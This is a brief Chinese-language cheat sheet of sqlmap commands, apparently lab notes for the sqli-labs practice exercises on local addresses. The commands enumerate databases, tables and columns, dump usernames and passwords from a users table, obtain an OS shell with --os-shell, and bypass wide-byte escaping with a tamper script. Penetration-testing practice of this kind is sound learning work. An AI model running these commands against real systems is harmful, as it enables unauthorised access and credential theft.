确定注入点后测试
sqlmap -u http://localhost/sqli/Less-1/?id=1

当前数据库
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db
其他数据库
--dbs
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -dbs
数据库内表
-D security --tables
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables
表内字段
-D security -T users --columns
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns
-D security -T users -C username,password --dump
sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump
注入Shell
sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell
宽字节注入
使用 unmagicquotes 方法进行宽字节绕过
sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs
|